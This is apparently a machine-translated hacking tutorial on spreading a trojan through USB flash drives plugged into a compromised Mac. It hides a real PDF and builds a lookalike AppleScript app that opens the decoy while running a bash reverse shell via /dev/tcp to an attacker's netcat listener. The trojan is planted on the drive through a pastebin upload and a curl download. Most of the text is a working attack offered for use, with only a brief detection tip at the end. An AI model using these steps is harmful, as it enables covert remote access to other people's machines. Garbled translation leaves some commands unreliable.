It's not uncommon for hackers to try to move sideways between devices near a compromised device to maintain a longer network presence. Malware that uses USB flash drives to self-replicate and compromise air-gap machines is not a new concept.
Both in business and in social environments, it's common for users to access data via USB sticks, USB Sticks or thumbs swap and exchange drives, flash sticks or whatever you want to call them. Finally, they were developed to store and share data. This makes it an excellent vector for distributing malicious files among large groups of employees, classmates, and individuals. By manipulating or replacing files that are already on the flash drives, we can easily mislead a target into believing that files are benign and completely harmless.
Understanding USB Attack
We begin by listing USB flash drives used in a backdoored macOS device. After identifying a suitable flash drive, we examine its content for a file that is intended to mimic (or copy). The copied file can be any PDF, image, media file or text file. The copy disappears from the target when using Finder to view files on the flash drive.
A trojanized AppleScript is then created and uploaded to the target's flash drive. When the stick is released and someone clicks on the trojanized AppleScript, the hidden copy is opened – which causes the target to believe the file is legitimate – and our payload runs in the background.
For this attack to succeed, the target of one of its flash drives must be inserted into the macOS device. Connected USB sticks can be learned with the command system_profiler SPUSBDataType .
system_profiler SPUSBDataType 1 USB 3.0 bus: 2 DataTraveler 3.0: 3 Product ID: 0x1666 4 Manufacturer ID: 0x0951 (Kingston Technology Company) 5 version: 1.00 6 serial number: XXXXXXXXXXXXXXXXXXXXXXXXX 7 Speed: Up to 5 Gb / sec 8 Manufacturer: Kingston 9 Location ID: 0x14400000 / 4 10 current available (mA): 900 11 Current required (mA): 504 12 additional operating current (mA): 0 13 media: 14 DataTraveler 3.0: 15 capacity: 15.5 GB (15,502,147,584 bytes) 16 removable media: Yes 17 BSD name: disk2 18 Logical unit: 0 19 Partition Type: MBR (Master Boot Record) 20 USB interface: 0 21 volumes: 22 KINGSTON: 23 capacity: 15.5 GB (15,498,018,816 bytes) 24 Available: 15.36 GB (15,360,786,432 bytes) 25 Writable: Yes 26 File system: MS-DOS FAT32 27 BSD name: disk2s1 28 Mount Point: / Volumes / KINGSTON 29 Content: Windows_FAT_32 30 Volume UUID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXXX
When accessing a flash drive for this attack, there are some important details to consider:
Indicates whether the flash drive is read-only (line 25 above) ) is important. If the read-only flash drive is enabled or a physical write-protect switch is enabled, new (trojanized) files can not be saved. However, this is a rare scenario. If someone inserts a flash drive into their MacBook to store files on, the flash drive is probably readable and writable for us. Writability is something to watch out for before proceeding.
The amount of free space (line 24 above) is important. Obviously, at least a few megabytes must be available on the flash drive to add or replace files. The above example of the flash drive has more than 15 GB of free space, but keep that in mind before writing any user data to the device.
In addition, the file system format (line 26 above) should be considered. USB flash drives formatted with Apple's APFS file system take more steps to make this attack work, but that's beyond the scope of this article. In the coming weeks I will delve deeper into this topic and demonstrate why macOS is so vulnerable to USB attacks. Fortunately, the chances of encountering an APFS-formatted flash drive are slim. Currently, flash drives formatted with NTFS, exFAT and FAT32 are perfect. These formats are much more common for cross-platform systems and are pre-formatted by manufacturers by default.
For a suitable flash drive candidate, note the mount point (line 28 above) and then the list ( ls ) its contents. The name of my flash drive is "KINGSTON", which was assigned by default by its production company. I will use "USB-NAME-HERE" for the rest of the article. Your USB will probably be something completely different (like "SanDisk" or "Samsung_USB"). Remember to change it accordingly.
ls -la / Volumes / USB-NAME-HERE / a total of 233280 drwxrwxrwx @ 1 tokyoneon employee 16384 Aug 19 14:03. drwxr-xr-x @ 4 root wheel 136 Aug 19 14:03 .. drwxrwxrwx 1 tokyoneon employee 16384 May 19th 17:44. Spotlight-V100 drwxrwxrwx 1 tokyoneon employees 16384 Aug 19 14:03 .fseventsd -rwxrwxrwx 1 tokyoneon employee 4521984 June 3rd 21:26 DSC_0405.JPG -rwxrwxrwx 1 tokyoneon Employee 4566375 Aug 8 20:28 DSC_0497.JPG -rwxrwxrwx 1 tokyoneon Employee 1528811 June 3 21:26 Mastering Nmap Scripting Engine.pdf -rwxrwxrwx @ 1 tokyoneon employee 3555730 Jun 3 21:26 Penetration_Testing_with_the_Bash_Shell.pdf -rwxrwxrwx @ 1 tokyoneon Contributor 512055 31st July 00:32 Screen Shot 2018-07-31 at 12:32:27 AM.png -rwxrwxrwx @ 1 tokyoneon Employees 1585223 August 3rd 02:11 pm Screen Shot 2018-08-03 at 2:11:49 AM.png drwxrwxrwx 1 tokyoneon employee 16384 May 31 11:12 system volume information -rwxrwxrwx 1 tokyoneon Employees 24335922 3. Jun 21:26 The Hacker Playbook 2 - Practical Guide to Penetration Testing.pdf -rwxrwxrwx 1 tokyoneon Employees 14848250 June 3 21:26 Wireshark for Security Professionals.pdf -rwxrwxrwx 1 tokyoneon employee 4253 June 14 16:30 a.txt -rwxrwxrwx 1 tokyoneon employee 1622016 June 3 21:24 invoice_2018_april.pdf -rwxrwxrwx @ 1 tokyoneon employee 231712 Aug 17 23:26 image5435.jpg -rwxrwxrwx 1 tokyoneon employee 126092 June 7 19:17 log.txt -rwxrwxrwx 1 tokyoneon Employees 11681792 Jun 3 21:25 paystub.pdf
Step 2: Prepare Files on the USB Stick
Any PDF, image, media file, or text file can be used for this attack. Remember, the idea is to take an existing file and replace it with a nefarious file of our creation. If the file is opened on another computer, a backdoor is created and the device becomes available to us remotely.
Readers should familiarize themselves with one of my previous article series: " Creating a Fake PDF Trojan with AppleScript". There I show how AppleScript is used to present legitimate PDFs in more detail. If there are no PDF files on the destination USB flash drive, the same technique can be used to create counterfeit media and text files.
I will show the PDF file "Mastering Nmap Scripting Engine" on the flash drive. But remember, the more files we trojanize, the more likely someone will click on something and run the payload embedded in AppleScript.
Use the following command to hide and move what you want ( mv ) file
mv / Volumes / USB-NAME-HERE / Mastering Nmap Scripting Engine.pdf / Volumes / USB-NAME-HERE / .Mastering Nmap Scripting Engine.pdf
The dot (. ) prefixed with ".Mastering" is very important. In macOS, files that contain a dot before the file name are hidden in the Finder. This Finder setting is the default for all versions of macOS. Some users choose hidden files, but this option must be set manually, which reduces the likelihood that it will be activated.
Step 3: Starting a Netcat Listener
Before we start creating the AppleScript, open a terminal in Kali (or any Unix-based operating system with Netcat installed) and use the following command, to start a netcat listener. A connection to this netcat listener is established when the trojanized AppleScript is opened.
nc -l -p 9999
Netcat opens a listening port ( -l ) on every available interface. If you are working on a local network, the Netcat listener is available at your local address (for example, 192.168.0.X). If the listener is started on a virtual private server (VPS), you must use the IP address for your VPS in later commands. The port ( -p ) number ( 9999 ) is arbitrary and can be changed to any number under 65535.
Step 4: Creating a trojanized AppleScript application
Now with the Genuine PDF hidden, we can create our nefarious AppleScript to mimic the Nmap PDF. Unfortunately, this method Script Editor requires a scripting application that can only be found in macOS. Readers who do not have access to a MacBook or other Mac computer should get to know the Empire AppleScript Stager .
In macOS, open the Script Editor, open a "New Document" and paste the following text. Liner inside.
do shell script "Open" /Volumes/USB-NAME-HERE/.Mastering Nmap Scripting Engine.pdf & # 39; -a Preview.app; / bin / bash -i> & /dev/tcp/1.2 .3.4 / 9999 0> & 1 & "
To direct AppleScript to execute shell code, use do shell script at the beginning. The AppleScript will first open the specified PDF ( & # 39; / Volumes / USB-NAME-HERE / .Mastering Nmap Scripting Engine.pdf ) with the macOS preview ( -a Preview.app ) Application Then he (; ) silently connects with Bash ( / bin / bash -i> & ) () / dev / tcp / … 0> & 1) & ) to the Netcat listener so the attacker can remotely send commands to the device.
The attacker IP address ( 22.214.171.124 ) may be a local IP address (for example, 192.168.1.45).) However, this type of attack is probably most effective with a VPS, in which case, replace the address 126.96.36.199 The IP address of your VPS. Which IP address you use The IP address should point to the system where the Netcat listener is running. The port number ( 9999 ) should also be changed to match the port used by the Netcat listener.
When that's done, click "File" on the menu bar and then click "Export." Save the script with the file format "Application".
At this point, the file icon and file extension should be correctly disguised. This was covered in detail in one of my articles "Creating a Fake PDF Trojan with AppleScript", so I'll go ahead.
Step 5: Transfer the Tronjanized file to the target's flash drive
The wrong Nmap PDF we've just created with our macOS device needs to be moved to the target's USB flash drive , To accomplish this, we use tar a command-line tool to compress the file. Then we upload them to a file sharing site to make them available for download via the target's MacBook.
Open a terminal and compress the fake PDF with the following command tar ] tar -czvf outputFile.tar.gz Mastering Nmap Scripting Engine.app/
a Mastering Nmap Scripting Engine.app
a Mastering Nmap Scripting Engine.app / Contents
a Mastering Nmap Scripting Engine.app/Contents/Info.plist
a Mastering Nmap Scripting Engine.app/Contents/MacOS
a Mastering Nmap Scripting Engine.app / Contents / PkgInfo
a mastering nmap scripting engine.app/contents/resources
a mastering nmap scripting engine.app/contents/resources/applet.icns
a Mastering Nmap Scripting Engine.app/Contents/Resources/applet.rsrc
a Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd
a Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts
a Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/main.scpt
a Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/TXT.rtf
A Mastering Nmap Scripting Engine.app/Contents/MacOS/applet
Tar creates (. -cz ) a .tar.gz compressed output file (similar to ZIP files) with the file () f ) or directory that we specify. In this case, I am using the wrong Nmap Trojan we just created. When done, upload the outputFile.tar.gz file to the Pb pastebin with the following cURL command. Pb is generally my preferred way to get files, but if you're comfortable with another file-sharing site, it should work well.
curl -Fc = @ - # https: //ptpb.pw # outputFile.tar.gz short: AB12 Size: 49270 Status: created url: https://ptpb.pw/AB12
Similar to other file sharing sites, Pb returns a four-digit URL address ( AB12 ) in which your fake PDF can be downloaded.  Now, with the Backdoctor MacBook, the following command can be executed to download and extract the fake PDF into the desired USB flash drive.
curl # https: //ptpb.pw/AB12' | Tar xv % Total% Received% Xferd Average Speed Time Time Time Current Dload Upload Uploaded Total Left Speed 100 49270 100 49270 0 0 9307 0 0:00:05 0:00:05 -: -: - 14145 x ./._Mastering Nmap Scripting Engine.app x Master Nmap Scripting Engine x Master the Nmap Scripting Engine.app/Contents/ x Mastering by Nmap Scripting Engine.app/Contents/Info.plist x Mastering by Nmap Scripting Engine.app/Contents/MacOS/ x Mastering the Nmap Scripting Engine.app/Contents/PkgInfo x Mastering the Nmap Scripting Engine.app/Contents/Resources/ x Mastering the Nmap Scripting Engine.app/Contents/Resources/applet.icns x Mastering the Nmap Scripting Engine.app/Contents/Resources/applet.rsrc x Mastering by Nmap Scripting Engine.app/Contents/Resources/description.rtfd/ x Mastering the Nmap Scripting Engine.app/Contents/Resources/Scripts/ x Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/main.scpt x Mastering the Nmap Scripting Engine.app/Contents/Resources/description.rtfd/TXT.rtf x Mastering Nmap Scripting Engine.app/Contents/MacOS/applet
The compressed output is downloaded using cURL, redirected to the tar decompressed command ( xv ), and automatically saved to the flash drive. The target that uses the Finder to view the contents of the flash drive becomes just a harmless Nmap PDF
When the fake PDF is opened by the target on another computer – or by employees and employees of the target – it connects to the Netcat listener. If we use ls again to display the content of the target's flash drive, we can see that now two files have the same file name.
ls -la / Volumes / USB-NAME-HERE / drwxrwxrwx @ 1 tokyoneon employee 16384 Aug 19 14:03. drwxr-xr-x @ 4 root wheel 136 Aug 19 14:03 .. drwxrwxrwx 1 tokyoneon employee 16384 May 19th 17:44. Spotlight-V100 drwxrwxrwx 1 tokyoneon employees 16384 Aug 19 14:03 .fseventsd -rwxrwxrwx 1 tokyoneon employee 4521984 June 3rd 21:26 DSC_0405.JPG -rwxrwxrwx 1 tokyoneon Employee 4566375 Aug 8 20:28 DSC_0497.JPG -rwxrwxrwx 1 tokyoneon Employee 1528811 June 3 21:26 .Mastering Nmap Scripting Engine.pdf -rwxrwxrwx @ 1 tokyoneon employee 3555730 Jun 3 21:26 Penetration_Testing_with_the_Bash_Shell.pdf -rwxrwxrwx @ 1 tokyoneon Contributor 512055 31st July 00:32 Screen Shot 2018-07-31 at 12:32:27 AM.png -rwxrwxrwx @ 1 tokyoneon Employees 1585223 August 3rd 02:11 pm Screen Shot 2018-08-03 at 2:11:49 AM.png drwxrwxrwx 1 tokyoneon employee 16384 May 31 11:12 system volume information -rwxrwxrwx 1 tokyoneon Employees 24335922 3. Jun 21:26 The Hacker Playbook 2 - Practical Guide to Penetration Testing.pdf -rwxrwxrwx 1 tokyoneon Employees 14848250 June 3 21:26 Wireshark for Security Professionals.pdf -rwxrwxrwx 1 tokyoneon employee 4253 June 14 16:30 a.txt -rwxrwxrwx 1 tokyoneon employee 1622016 June 3 21:24 invoice_2018_april.pdf -rwxrwxrwx @ 1 tokyoneon employee 231712 Aug 17 23:26 image5435.jpg -rwxrwxrwx 1 tokyoneon employee 126092 June 7 19:17 log.txt -rwxrwxrwx 1 tokyoneon employees 11681792 3. Jun 21:25 paystub.pdf drwxrwxrwx @ 1 tokyoneon staff 16K Aug 19 19:56 Mastering Nmap Scripting Engine.app/
This is the "Mastering Nmap Scripting Engine.app /" – this is the Trojan that appears to the target as an ordinary PDF. Also on the flash drive is ".Mastering Nmap Scripting Engine.pdf" – this is the real PDF opened by the Trojan to believe the goal is that the file is a normal PDF.
It is not possible to hide file extensions from Terminal commands. If in doubt, use ls to display files on USB flash drives, try renaming files on the drives to reveal strange Unicode tricks, and try to open duplicate files to open them ,
Good $ 6 USB stick for testing hacks On: 16 GB Kingston Digital DataTraveler 3.0 ( Amazon | Best Buy | Walmart)